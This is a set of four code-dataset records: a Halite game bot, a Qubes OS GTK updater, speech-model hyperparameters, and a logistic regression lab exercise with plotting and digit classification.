+{"seq_id":"148001241","text":"import hlt\nimport logging\nfrom time import time\n\n#SETUP\n\nclass Bot:\n def __init__(self, entity, my_id, myShips):\n self.ship = entity\n \n self.playerID = my_id\n self.teamShips = myShips\n \n def findNearbyEntities(self, gameMap):\n self.entitiesDistance = gameMap.nearby_entities_by_distance(self.ship)\n \n def sortNearbyEntities(self):\n self.planetsOfInterest = []\n self.closestShip = None\n tempSortedEntities = sorted(self.entitiesDistance)\n found = False\n for distance in tempSortedEntities:\n entity = self.entitiesDistance[distance][0]\n if self.isPlanet(entity, self.playerID):\n \n self.planetsOfInterest.append((entity, distance)) \n if self.isShip(entity, self.playerID, self.teamShips) and not found:\n found = True\n self.closestShip = (entity, distance)\n\n def getPriorities(self, gameMap):\n self.findNearbyEntities(gameMap)\n self.sortNearbyEntities()\n self.priorities = self.planetsOfInterest\n self.priorities.append(self.closestShip)\n if self.closestShip[1] < 25:\n self.priorities.reverse()\n return self.priorities\n\n\n def isPlanet(self, entity, myID):\n if isinstance(entity, hlt.entity.Planet):\n return (not entity.is_owned() or (entity.owner.id == myID and not entity.is_full()))\n return False\n \n def isShip(self,entity, myID, teamShips):\n return isinstance(entity, hlt.entity.Ship) and not entity in teamShips\n\nclass BotController:\n def __init__(self):\n self.game = hlt.Game(\"Settler\")\n\n self.command_queue = []\n \n def update(self):\n self.start = time()\n self.gameMap = self.game.update_map()\n self.myID = self.gameMap.my_id\n self.myBots = []\n self.command_queue = []\n \n def getShips(self):\n myShips = []\n \n for ship in self.gameMap.get_me().all_ships():\n myShips.append(ship)\n\n return myShips\n\n def createBots(self):\n ships = self.getShips()\n self.myBots = []\n for bot in ships:\n self.myBots.append(Bot(bot,self.myID,ships))\n\n def getBotPriorities(self):\n botPriorities = {}\n for bot in self.myBots:\n botPriorities[bot.ship] = bot.getPriorities(self.gameMap)\n return self.sortBotPriorities(botPriorities)\n\n def sortBotPriorities(self, botPriorities):\n tempBotPriorities = sorted(botPriorities, key = lambda bot:botPriorities[bot][0][1])\n finalBotPriorities = {}\n for bot in tempBotPriorities:\n finalBotPriorities[bot] = botPriorities[bot]\n return finalBotPriorities\n\n def getPlanetSpaces(self):\n planetSpaces = {}\n for planet in self.gameMap.all_planets():\n planetSpaces[planet] = planet.num_docking_spots-len(planet._docked_ship_ids)\n return planetSpaces\n\n def getCommands(self): \n priorities = self.getBotPriorities()\n planetSpaces = self.getPlanetSpaces()\n for bot in priorities:\n if bot.docking_status != bot.DockingStatus.UNDOCKED:\n continue\n navigateCommand = None\n for preference in priorities[bot]:\n target = preference[0]\n if self.isPlanet(target):\n if bot.can_dock(target):\n planetSpaces[target] -= 1\n navigateCommand = bot.dock(target)\n break\n if planetSpaces[target] > 0:\n planetSpaces[target] -= 1\n navigateCommand = bot.navigate(\n bot.closest_point_to(target),\n self.gameMap,\n speed=int(hlt.constants.MAX_SPEED),\n ignore_ships=False)\n break\n else:\n #Attack Ship Code\n navigateCommand = bot.navigate(\n bot.closest_point_to(target),\n self.gameMap,\n speed=int(hlt.constants.MAX_SPEED),\n ignore_ships=False)\n break\n if navigateCommand:\n self.command_queue.append(navigateCommand)\n \n def sendCommands(self):\n logging.info(self.start-time())\n self.game.send_command_queue(self.command_queue)\n \n\n def isPlanet(self,entity):\n return isinstance(entity, hlt.entity.Planet)\n\n#START GAME\nController = BotController()\n\nlogging.info(\"Initialising Robbot...\")\n\n\nwhile True:\n Controller.update()\n Controller.createBots()\n Controller.getCommands()\n Controller.sendCommands()\n \n \n \n \n","sub_path":"MyBot-v8.py","file_name":"MyBot-v8.py","file_ext":"py","file_size_in_byte":4928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"552093519","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# pylint: disable=wrong-import-position,import-error\n\nimport re\nimport time\nimport threading\nimport subprocess\nimport pkg_resources\nimport gi # isort:skip\ngi.require_version('Gtk', '3.0') # isort:skip\nfrom gi.repository import Gtk, Gdk, GObject, Gio # isort:skip\nfrom qubesadmin import Qubes\nfrom qubesadmin import exc\n\n# using locale.gettext is necessary for Gtk.Builder translation support to work\n# in most cases gettext is better, but it cannot handle Gtk.Builder/glade files\nimport locale\nfrom locale import gettext as _\nlocale.bindtextdomain(\"desktop-linux-manager\", \"/usr/locales/\")\nlocale.textdomain('desktop-linux-manager')\n\nclass QubesUpdater(Gtk.Application):\n # pylint: disable=too-many-instance-attributes\n\n def __init__(self, qapp):\n super().__init__(\n application_id=\"org.gnome.example\",\n flags=Gio.ApplicationFlags.FLAGS_NONE)\n\n self.qapp = qapp\n\n self.primary = False\n self.connect(\"activate\", self.do_activate)\n\n def perform_setup(self, *_args, **_kwargs):\n # pylint: disable=attribute-defined-outside-init\n self.builder = Gtk.Builder()\n self.builder.set_translation_domain(\"desktop-linux-manager\")\n self.builder.add_from_file(pkg_resources.resource_filename(\n __name__, 'updater.glade'))\n\n self.main_window = self.builder.get_object(\"main_window\")\n\n self.vm_list = self.builder.get_object(\"vm_list\")\n\n self.updates_available = self.populate_vm_list()\n\n self.no_updates_available_label = \\\n self.builder.get_object(\"no_updates_available\")\n self.no_updates_available_label.set_visible(not self.updates_available)\n\n self.allow_update_unavailable_check = \\\n self.builder.get_object(\"allow_update_unavailable\")\n self.allow_update_unavailable_check.connect(\"clicked\",\n self.set_update_available)\n\n self.next_button = self.builder.get_object(\"button_next\")\n self.next_button.connect(\"clicked\", self.next_clicked)\n\n self.cancel_button = self.builder.get_object(\"button_cancel\")\n self.cancel_button.connect(\"clicked\", self.cancel_updates)\n self.main_window.connect(\"delete-event\", self.window_close)\n self.main_window.connect(\"key-press-event\", self.check_escape)\n\n self.stack = self.builder.get_object(\"main_stack\")\n self.list_page = self.builder.get_object(\"list_page\")\n self.progress_page = self.builder.get_object(\"progress_page\")\n self.finish_page = self.builder.get_object(\"finish_page\")\n self.progress_textview = self.builder.get_object(\"progress_textview\")\n self.progress_scrolled_window = self.builder.get_object(\n \"progress_scrolled_window\")\n self.progress_listview = self.builder.get_object(\"progress_listview\")\n\n self.details_visible = True\n self.details_icon = self.builder.get_object(\"details_icon\")\n self.builder.get_object(\"details_icon_events\").connect(\n \"button-press-event\", self.toggle_details)\n self.builder.get_object(\"details_label\").connect(\n \"clicked\", self.toggle_details)\n\n self.load_css()\n\n self.main_window.show_all()\n self.toggle_details()\n\n self.update_thread = None\n self.exit_triggered = False\n\n def do_activate(self, *_args, **_kwargs):\n if not self.primary:\n self.perform_setup()\n self.primary = True\n self.hold()\n else:\n self.main_window.present()\n\n @staticmethod\n def load_css():\n style_provider = Gtk.CssProvider()\n css = b'''\n .black-border { \n border-width: 1px; \n border-color: #c6c6c6; \n border-style: solid;\n }\n '''\n style_provider.load_from_data(css)\n\n Gtk.StyleContext.add_provider_for_screen(\n Gdk.Screen.get_default(),\n style_provider,\n Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)\n\n def populate_vm_list(self):\n result = False # whether at least one VM has updates available\n for vm in self.qapp.domains:\n if vm.klass == 'AdminVM':\n try:\n state = vm.features.get('updates-available', False)\n except exc.QubesDaemonCommunicationError:\n state = False\n result = result or state\n self.vm_list.add(VMListBoxRow(vm, state))\n\n for vm in self.qapp.domains:\n if getattr(vm, 'updateable', False) and vm.klass != 'AdminVM':\n try:\n state = vm.features.get('updates-available', False)\n except exc.QubesDaemonCommunicationError:\n state = False\n result = result or state\n vmrow = VMListBoxRow(vm, state)\n self.vm_list.add(vmrow)\n vmrow.checkbox.connect('toggled', self.checkbox_checked)\n\n self.vm_list.connect(\"row-activated\", self.toggle_row_selection)\n return result\n\n def checkbox_checked(self, _emitter, *_args):\n for vm_row in self.vm_list:\n if vm_row.checkbox.get_active():\n self.next_button.set_sensitive(True)\n return\n self.next_button.set_sensitive(False)\n\n @staticmethod\n def toggle_row_selection(_emitter, row):\n if row:\n row.checkbox.set_active(not row.checkbox.get_active())\n row.set_label_text()\n\n def set_update_available(self, _emitter):\n for vm_row in self.vm_list:\n if not vm_row.updates_available:\n vm_row.set_sensitive(\n self.allow_update_unavailable_check.get_active())\n if not vm_row.get_sensitive():\n vm_row.checkbox.set_active(False)\n\n def next_clicked(self, _emitter):\n if self.stack.get_visible_child() == self.list_page:\n self.stack.set_visible_child(self.progress_page)\n\n for row in self.vm_list:\n if row.checkbox.get_active():\n self.progress_listview.add(ProgressListBoxRow(row.vm))\n\n self.progress_listview.show_all()\n\n self.next_button.set_sensitive(False)\n self.next_button.set_label(_(\"_Finish\"))\n\n # pylint: disable=attribute-defined-outside-init\n self.update_thread = threading.Thread(target=self.perform_update)\n self.update_thread.start()\n\n elif self.stack.get_visible_child() == self.progress_page:\n self.cancel_updates()\n return\n\n def toggle_details(self, *_args, **_kwargs):\n # pylint: disable=attribute-defined-outside-init\n self.details_visible = not self.details_visible\n self.progress_textview.set_visible(self.details_visible)\n\n if self.details_visible:\n self.progress_textview.show()\n self.progress_scrolled_window.show()\n else:\n self.progress_textview.hide()\n self.progress_scrolled_window.hide()\n\n if self.details_visible:\n self.details_icon.set_from_icon_name(\"pan-down-symbolic\",\n Gtk.IconSize.BUTTON)\n else:\n self.details_icon.set_from_icon_name(\"pan-end-symbolic\",\n Gtk.IconSize.BUTTON)\n\n def append_text_view(self, text):\n buffer = self.progress_textview.get_buffer()\n buffer.insert(buffer.get_end_iter(), text + '\\n')\n\n def perform_update(self):\n for row in self.progress_listview:\n if self.exit_triggered:\n GObject.idle_add(row.set_status, 'failure')\n GObject.idle_add(\n self.append_text_view,\n _(\"Canceled update for {}\\n\").format(row.vm.name))\n continue\n\n GObject.idle_add(\n self.append_text_view, _(\"Updating {}\\n\").format(row.vm.name))\n GObject.idle_add(row.set_status, 'in-progress')\n\n try:\n if row.vm.klass == 'AdminVM':\n output = subprocess.check_output(\n ['sudo', 'qubesctl', '--dom0-only', '--no-color',\n 'pkg.upgrade', 'refresh=True'],\n stderr=subprocess.STDOUT).decode()\n ansi_escape = re.compile(r'(\\x9B|\\x1B\\[)[0-?]*[ -/]*[@-~]')\n output = ansi_escape.sub('', output)\n else:\n output = subprocess.check_output(\n ['sudo', 'qubesctl', '--skip-dom0',\n '--targets=' + row.vm.name, '--show-output',\n 'state.sls', 'update.qubes-vm'],\n stderr=subprocess.STDOUT).decode()\n\n GObject.idle_add(self.append_text_view, output)\n GObject.idle_add(row.set_status, 'success')\n\n except subprocess.CalledProcessError as ex:\n GObject.idle_add(\n self.append_text_view,\n _(\"Error on updating {}: {}\\n{}\").format(\n row.vm.name, str(ex), ex.output.decode()))\n GObject.idle_add(row.set_status, 'failure')\n\n GObject.idle_add(self.next_button.set_sensitive, True)\n GObject.idle_add(self.cancel_button.set_visible, False)\n\n def cancel_updates(self, *_args, **_kwargs):\n # pylint: disable=attribute-defined-outside-init\n if self.update_thread and self.update_thread.is_alive():\n self.exit_triggered = True\n dialog = Gtk.MessageDialog(\n self.main_window, Gtk.DialogFlags.MODAL, Gtk.MessageType.OTHER,\n Gtk.ButtonsType.NONE, _(\n \"Waiting for current qube to finish updating.\"\n \" Updates for remaining qubes have been cancelled.\"))\n dialog.show()\n while self.update_thread.is_alive():\n while Gtk.events_pending():\n Gtk.main_iteration()\n time.sleep(1)\n dialog.hide()\n else:\n self.exit_updater()\n\n def check_escape(self, _widget, event, _data=None):\n if event.keyval == Gdk.KEY_Escape:\n self.cancel_updates()\n\n def window_close(self, *_args, **_kwargs):\n if self.stack.get_visible_child() == self.progress_page:\n self.cancel_updates()\n self.exit_updater()\n\n def exit_updater(self, _emitter=None):\n if self.primary:\n self.release()\n\n\ndef get_domain_icon(vm):\n icon_vm = Gtk.IconTheme.get_default().load_icon(vm.label.icon, 16, 0)\n icon_img = Gtk.Image.new_from_pixbuf(icon_vm)\n return icon_img\n\n\nclass VMListBoxRow(Gtk.ListBoxRow):\n def __init__(self, vm, updates_available, **properties):\n super().__init__(**properties)\n self.vm = vm\n\n hbox = Gtk.HBox(orientation=Gtk.Orientation.HORIZONTAL)\n\n self.label_text = vm.name\n self.updates_available = updates_available\n if self.updates_available:\n self.label_text = _(\"{vm} (updates available)\").format(\n vm=self.label_text)\n self.label = Gtk.Label()\n self.icon = get_domain_icon(self.vm)\n\n self.checkbox = Gtk.CheckButton()\n self.checkbox.set_active(self.updates_available)\n self.checkbox.set_margin_right(10)\n\n self.checkbox.connect(\"clicked\", self.set_label_text)\n self.set_sensitive(self.updates_available)\n\n self.set_label_text()\n\n hbox.pack_start(self.checkbox, False, False, 0)\n hbox.pack_start(self.icon, False, False, 0)\n hbox.pack_start(self.label, False, False, 0)\n\n # check for VMs that may be restored from older Qubes versions\n # and not support updating; this is a heuristic and may not always work\n try:\n if vm.features.get('qrexec', False) and \\\n vm.features.get('gui', False) and \\\n not vm.features.get('os', False):\n warn_icon = Gtk.Image.new_from_pixbuf(\n Gtk.IconTheme.get_default().load_icon(\n 'dialog-warning', 12, 0))\n warn_icon.set_tooltip_text(\n 'This qube may have been restored from an older version of '\n 'Qubes OS and may not be able to update itself correctly. '\n 'Please check the documentation if problems occur.')\n hbox.pack_start(warn_icon, False, False, 0)\n except exc.QubesDaemonCommunicationError:\n # we have no permission to access the vm's features, there's no\n # point in guessing original Qubes version\n pass\n\n self.add(hbox)\n\n def set_label_text(self, _=None):\n if self.checkbox.get_active():\n self.label.set_markup(\"{} \".format(self.label_text))\n else:\n self.label.set_markup(self.label_text)\n\n\nclass ProgressListBoxRow(Gtk.ListBoxRow):\n def __init__(self, vm):\n super().__init__()\n\n self.vm = vm\n\n hbox = Gtk.HBox(orientation=Gtk.Orientation.HORIZONTAL)\n\n self.icon = get_domain_icon(self.vm)\n self.icon.set_margin_right(10)\n\n self.label = Gtk.Label(vm.name)\n self.label.set_margin_right(10)\n\n self.progress_box = Gtk.HBox(orientation=Gtk.Orientation.HORIZONTAL)\n\n hbox.pack_start(self.icon, False, False, 0)\n hbox.pack_start(self.label, False, False, 0)\n hbox.pack_start(self.progress_box, False, False, 0)\n\n self.set_status('not-started')\n self.add(hbox)\n\n def set_status(self, status):\n\n if status == 'not-started':\n widget = Gtk.Spinner()\n elif status == 'in-progress':\n widget = Gtk.Spinner()\n widget.start()\n elif status == 'success':\n widget = Gtk.Image.new_from_icon_name(\"gtk-apply\",\n Gtk.IconSize.BUTTON)\n elif status == 'failure':\n widget = Gtk.Image.new_from_icon_name(\"gtk-cancel\",\n Gtk.IconSize.BUTTON)\n else:\n raise ValueError(_(\"Unknown status {}\").format(status))\n\n for child in self.progress_box.get_children():\n self.progress_box.remove(child)\n\n self.progress_box.pack_start(widget, False, False, 0)\n\n widget.show()\n\n\ndef main():\n qapp = Qubes()\n app = QubesUpdater(qapp)\n app.run()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"qui/updater.py","file_name":"updater.py","file_ext":"py","file_size_in_byte":14654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"242501617","text":"import tensorflow as tf\n\nhparams = tf.contrib.training.HParams(\n num_mels=80,\n frame_length_ms=50,\n frame_shift_ms=12.5,\n hop_length=int(16000 * 0.0125), # samples.\n win_length=int(16000 * 0.05), # samples.\n max_db=100,\n ref_db=20,\n preemphasis=0.97,\n max_abs_value=4.0,\n symmetric_mel=True,\n sr=16000,\n n_fft=2048,\n\n n_iter=60,\n power=1.5,\n max_generation_frames=1300,\n max_eval_batches=20,\n max_eval_sample_length=1300,\n eval_sample_per_speaker=4,\n\n vocab_size=40000,\n embed_size=512,\n encoder_hidden=512,\n decoder_hidden=640,\n n_encoder_layer=5,\n n_decoder_layer=4,\n n_attention_head=8,\n transformer_dropout_rate=0.1,\n decoder_dropout_rate=0.5,\n prenet_hidden=256,\n postnet_hidden=512,\n n_postnet_layer=5,\n\n use_knowledge_attention=True,\n knowledge_value_size=2048,\n knowledge_key_size=1024,\n knowledge_start_layer=1,\n knowledge_end_layer=5,\n knowledge_attention_head=4,\n use_key_encoder=False,\n key_encode_layers=1,\n use_identical_key_context=False,\n\n token_dropout_rate=0.0,\n\n data_format=\"nltpi\",\n input_method=\"char\",\n use_sos=True,\n remove_space=False,\n bucket_size=512,\n shuffle_training_data=True,\n batch_frame_limit=8000,\n batch_frame_quad_limit=8000000,\n max_batch_size=32,\n balanced_training=False,\n lg_prob_scale=0.2,\n adapt_start_step=30000,\n adapt_end_step=30000,\n final_adapt_rate=0.25,\n data_warmup_steps=30000,\n target_length_lower_bound=240,\n target_length_upper_bound=800,\n\n reg_weight=5e-9,\n\n multi_speaker=True,\n max_num_speaker=1000,\n speaker_embedding_size=128,\n\n multi_lingual=False,\n max_num_language=100,\n language_net_hidden=128,\n language_embedding_size=128,\n front_lang_embed=True,\n\n warmup_steps=50000,\n max_lr=1e-3,\n min_lr=1e-5,\n lr_decay_step=550000,\n lr_decay_rate=1e-2,\n adam_eps=5e-8,\n\n external_embed_dim=1024,\n use_external_embed=True,\n)\n","sub_path":"hyperparams.py","file_name":"hyperparams.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"580994407","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\n\n\ndef load_file(filename, names):\n return pd.read_csv(filename, header=None, names=names)\n\n\ndf = load_file('ex2data1.txt', ['first_exam', 'second_exam', 'accepted'])\nX_train, y_train = df.filter(['first_exam', 'second_exam']), df['accepted']\n\n\nz_true = df[df['accepted'] == 1]\nz_false = df[df['accepted'] == 0]\nfig, ax = plt.subplots()\nax.scatter(z_true['first_exam'], z_true['second_exam'], marker='o', c='g', label='Accepted', s=20)\nax.scatter(z_false['first_exam'], z_false['second_exam'], marker='x', c='r', label='Not accepted', s=20)\nax.legend(loc='upper right');\nax.set_xlabel('First exam')\nax.set_ylabel('Second exam')\nplt.show()\n\n\nfrom utils import sigmoid\n\nclass LogisticRegression:\n THRESHOLD = 1e-6\n\n def __init__(self, fit_method='gradient_descent', max_steps=100000,\n learning_rate=0.01, regularized=False, reg_L=0.5, log=False):\n self.weights = []\n self.max_steps = max_steps\n self.learning_rate = learning_rate\n self.regularized = regularized\n self.reg_L = reg_L\n self.cost_func = self.cost_func_regularized if regularized else self.cost_func_non_regularized\n self.cost_der = self.cost_der_regularized if regularized else self.cost_der_non_regularized\n self.fit_method = getattr(self, fit_method)\n self.log = log\n \n def fit(self, X, y):\n if hasattr(X, 'values'):\n X = X.values\n if hasattr(y, 'values'):\n y = y.values\n\n X = X.astype('float64') \n y = y.astype('float64')\n \n if not self.regularized:\n X = np.column_stack((np.ones(X.shape[0]), X))\n \n self.fit_method(X, y)\n \n def predict(self, X):\n if self.weights is None:\n raise Exception(\"Model is not trained. Call `fit` method.\")\n\n X = np.array(X)\n if not self.regularized:\n X = np.insert(X, 0, 1)\n h = self.calculate_hypotesis(X)\n return 1 if h >= 0.5 else 0\n \n def gradient_descent(self, X, y):\n self.cost_history = []\n self.weights = np.zeros(X.shape[1])\n cur_loss = self.cost_func(X, y)\n\n cur_step = 0\n while cur_step < self.max_steps:\n cur_step += 1\n self.gradient_descent_step(X, y)\n new_loss = self.cost_func(X, y)\n self.cost_history.append(new_loss)\n if abs(new_loss - cur_loss) < self.THRESHOLD:\n break\n\n cur_loss = new_loss\n \n def gradient_descent_step(self, X, y):\n gradient = self.cost_der(X, y, self.weights)\n gradient *= self.learning_rate\n self.weights -= gradient\n \n def cost_func_non_regularized(self, X, y, weights=None):\n if weights is None:\n weights = self.weights\n \n predictions = self.calculate_hypotesis(X, weights)\n cost_trues = y * np.log(predictions)\n cost_falses = (1 - y) * np.log(1 - predictions)\n total_cost = -np.mean(cost_trues + cost_falses)\n return total_cost\n \n def cost_func_regularized(self, X, y, weights=None):\n if weights is None:\n weights = self.weights\n \n cost = self.cost_func_non_regularized(X, y, weights)\n weights_R = weights[1:]\n total_cost = cost + (self.reg_L / 2 / X.shape[0]) * np.dot(weights_R.T, weights_R)\n return total_cost\n \n def calculate_hypotesis(self, X, weights=None):\n if weights is None:\n weights = self.weights\n\n return sigmoid(X.dot(weights))\n \n def cost_der_non_regularized(self, X, y, theta):\n predictions = self.calculate_hypotesis(X, weights=theta)\n sq_error = predictions - y\n gradient = np.dot(X.T, sq_error)\n gradient /= X.shape[0]\n return gradient\n\n def cost_der_regularized(self, X, y, theta):\n predictions = self.calculate_hypotesis(X, weights=theta)\n sq_error = predictions - y\n gradient_first = np.dot(X.T[:1], sq_error)\n gradient_full = np.dot(X.T[1:], sq_error) + self.reg_L * theta[1:]\n gradient = np.insert(gradient_full, 0, gradient_first)\n gradient /= X.shape[0]\n return gradient\n \n def nelder_mead_algo(self, X, y):\n from scipy.optimize import fmin\n\n N = X.shape[0]\n\n def func(theta):\n return self.cost_func(X, y, theta)\n \n init_theta = np.zeros(X.shape[1])\n self.weights = fmin(func, init_theta, xtol=self.THRESHOLD, maxfun=100000)\n \n def bfgs_algo(self, X, y):\n from scipy.optimize import fmin_bfgs\n\n N = X.shape[0]\n\n def func(theta):\n return self.cost_func(X, y, theta)\n \n def func_der(theta):\n return self.cost_der(X, y, theta)\n\n init_theta = np.zeros(X.shape[1])\n self.weights = fmin_bfgs(func, init_theta, fprime=func_der, gtol=self.THRESHOLD, disp=self.log)\n \n\ncls_grad = LogisticRegression(fit_method='gradient_descent', max_steps=300000, learning_rate=0.004)\ncls_grad.fit(X_train, y_train)\nprint(f'Minimum cost function value: {cls_grad.cost_history[-1]}')\nprint(f'Iterations: {len(cls_grad.cost_history)}')\nprint(f'Weights: {cls_grad.weights}')\n\ncls_nm = LogisticRegression(fit_method='nelder_mead_algo')\ncls_nm.fit(X_train, y_train)\nprint(f'Weights: {cls_nm.weights}')\n\ncls_bfgs = LogisticRegression(fit_method='bfgs_algo', log=True)\ncls_bfgs.fit(X_train, y_train)\nprint(f'Weights: {cls_bfgs.weights}')\n\n\nz_true = df[df['accepted'] == 1]\nz_false = df[df['accepted'] == 0]\n\ndef decision_boundary(x, weights):\n return -(weights[0] + weights[1] * x) / weights[2]\n\nfig, ax = plt.subplots()\nax.scatter(z_true['first_exam'], z_true['second_exam'], marker='o', c='g', label='Accepted', s=20)\nax.scatter(z_false['first_exam'], z_false['second_exam'], marker='x', c='r', label='Not accepted', s=20)\nax.plot(z_false['first_exam'],\n [decision_boundary(i, cls_grad.weights) for i in z_false['first_exam']],\n c='b', label='Decision boundary')\nax.legend(loc='upper right');\nax.set_xlabel('First exam')\nax.set_ylabel('Second exam')\nplt.show()\n\n\ndf = load_file('ex2data2.txt', names=['first_test', 'second_test', 'passed'])\nX_train, y_train = df.filter(['first_test', 'second_test']), df['passed']\n\n\nz_true = df[df['passed'] == 1]\nz_false = df[df['passed'] == 0]\nfig, ax_reg = plt.subplots()\nax_reg.scatter(z_true['first_test'], z_true['second_test'], marker='o', c='g', label='Passed', s=20)\nax_reg.scatter(z_false['first_test'], z_false['second_test'], marker='x', c='r', label='Not passed', s=20)\nax_reg.legend(loc='upper right');\nax_reg.set_xlabel('First test')\nax_reg.set_ylabel('Second test')\nplt.show()\n\n\ndef build_poly_features(x1, x2, log=False):\n degree = 6\n res = []\n str_res = []\n\n for i in range(degree + 1):\n for j in range(i, degree + 1):\n res.append(x1**(j - i) * x2**i)\n first = '' if j - i == 0 else 'x1' if j - i == 1 else f'x1^{j - i}'\n second = '' if i == 0 else 'x2' if i == 1 else f'x2^{i}'\n if not first and not second:\n str_append = '1'\n elif first and not second:\n str_append = first\n elif second and not first:\n str_append = second\n else:\n str_append = f\"{first}*{second}\"\n str_res.append(str_append)\n\n str_res = ' + '.join(str_res)\n if log:\n print(str_res)\n assert len(res) == 28\n return np.array(res).T\n\n\nX_poly = build_poly_features(X_train['first_test'], X_train['second_test'], log=True)\n\ncls_grad_reg = LogisticRegression(fit_method='gradient_descent', regularized=True,\n max_steps=300000, learning_rate=0.5, reg_L=0.5)\ncls_grad_reg.fit(X_poly, y_train)\nprint(f'Minimum cost function value: {cls_grad_reg.cost_history[-1]}')\nprint(f'Iterations: {len(cls_grad_reg.cost_history)}')\nprint(f'Weights: {cls_grad_reg.weights}')\n\ncls_nm_reg = LogisticRegression(fit_method='nelder_mead_algo', regularized=True)\ncls_nm_reg.fit(X_poly, y_train)\nprint(f'Weights: {cls_nm_reg.weights}')\n\ncls_bfgs_reg = LogisticRegression(fit_method='bfgs_algo', regularized=True, log=True)\ncls_bfgs_reg.fit(X_poly, y_train)\nprint(f'Weights: {cls_bfgs_reg.weights}')\n\n\nprint(f\"Predicted class: {cls_grad_reg.predict(X_poly[0])}, actual class: {y_train[0]}\")\nprint(f\"Predicted class: {cls_nm_reg.predict(X_poly[0])}, actual class: {y_train[0]}\")\nprint(f\"Predicted class: {cls_bfgs_reg.predict(X_poly[0])}, actual class: {y_train[0]}\")\n\n\ndef decision_boundary_contour(theta1, theta2, theta3):\n u = np.linspace(-1, 1.2, 50)\n v = np.linspace(-1, 1.3, 50)\n z1 = np.zeros(shape=(len(u), len(v)))\n z2 = np.zeros(shape=(len(u), len(v)))\n z3 = np.zeros(shape=(len(u), len(v)))\n for i in range(len(u)):\n for j in range(len(v)):\n z1[i, j] = build_poly_features(np.array(u[i]), np.array(v[j])).dot(theta1)\n z2[i, j] = build_poly_features(np.array(u[i]), np.array(v[j])).dot(theta2)\n z3[i, j] = build_poly_features(np.array(u[i]), np.array(v[j])).dot(theta3)\n\n z1 = z1.T\n z2 = z2.T\n z3 = z3.T\n fig, ax_reg = plt.subplots()\n ax_reg.contour(u, v, z1, levels=0, colors='b')\n ax_reg.contour(u, v, z2, levels=0, colors='g')\n ax_reg.contour(u, v, z3, levels=0, colors='y')\n z_true = df[df['passed'] == 1]\n z_false = df[df['passed'] == 0]\n ax_reg.scatter(z_true['first_test'], z_true['second_test'], marker='o', c='g', label='Passed', s=20)\n ax_reg.scatter(z_false['first_test'], z_false['second_test'], marker='x', c='r', label='Not passed', s=20)\n ax_reg.legend(loc='upper right');\n ax_reg.set_xlabel('First test')\n ax_reg.set_ylabel('Second test')\n ax_reg.set_title('Decision boundary, lambda = %f' % cls_grad_reg.reg_L)\n plt.show()\n \ndecision_boundary_contour(cls_grad_reg.weights, cls_nm_reg.weights, cls_bfgs_reg.weights)\n\n\ncls1 = LogisticRegression(fit_method='gradient_descent', max_steps=300000, learning_rate=0.5,\n regularized=True, reg_L=0.5)\ncls1.fit(X_poly, y_train)\n\ncls2 = LogisticRegression(fit_method='gradient_descent', max_steps=300000, learning_rate=0.5,\n regularized=True, reg_L=0.05)\ncls2.fit(X_poly, y_train)\n\ncls3 = LogisticRegression(fit_method='gradient_descent', max_steps=300000, learning_rate=0.5,\n regularized=True, reg_L=0.005)\ncls3.fit(X_poly, y_train)\n\ndecision_boundary_contour(cls1.weights, cls2.weights, cls3.weights)\n\n\nfrom scipy.io import loadmat\n\nmat = loadmat('ex2data3.mat')\nX_train, y_train = mat['X'], mat['y']\ny_train = y_train.reshape(y_train.shape[0])\ny_train = np.where(y_train != 10, y_train, 0)\n\n\ndef vector_to_matrix(x):\n len_vec = len(x)\n step = int(np.sqrt(len_vec))\n assert step ** 2 == len_vec, 'Matrix should be squared' \n matrix = [x[left:left+step] for left in range(0, len_vec, step)]\n np_matrix = np.array(matrix).T\n reversed_matrix = np.flip(np_matrix, axis=0)\n return reversed_matrix\n\nnums = list(range(150, 5000, 500))\npictures = [vector_to_matrix(X_train[i]) for i in nums]\n\nfig, axs = plt.subplots(2, 5, figsize=(20, 8))\nfor i, ax in enumerate(axs.flatten()):\n ax.pcolor(pictures[i], cmap=cm.gray)\n res = y_train[nums[i]]\n if res == 10:\n res = 0\n ax.set_title(f'Number {res}')\n\nplt.show()\n\n\nclass MulticlassLogisticRegression:\n classifier = LogisticRegression\n\n def __init__(self, num_classes=10):\n self.num_classes = num_classes\n self.classifiers = [\n self.classifier(fit_method='gradient_descent', learning_rate=0.5, regularized=True, reg_L=0.1)\n for i in range(num_classes)\n ]\n \n def fit(self, X, y):\n for i in range(self.num_classes):\n y_train = (y == i).astype(int)\n self.classifiers[i].fit(X, y_train)\n \n def predict(self, X):\n h = []\n for cls in self.classifiers:\n h.append(cls.calculate_hypotesis(X))\n \n return np.argmax(np.array(h), axis=0)\n \n \ncls_mult = MulticlassLogisticRegression()\ncls_mult.fit(X_train, y_train)\npred_value = cls_mult.predict(X_train[-1])\nprint(f\"Predicted class: {pred_value}, actual class: {y_train[-1]}\")\n\n\ndef accuracy(cls, X, y):\n error = cls.predict(X) - y\n return 1.0 - (float(np.count_nonzero(error)) / len(error))\n\nacc = accuracy(cls_mult, X_train, y_train)\nprint(f\"Accuracy: {acc}\")\n","sub_path":"lab2/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":12513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
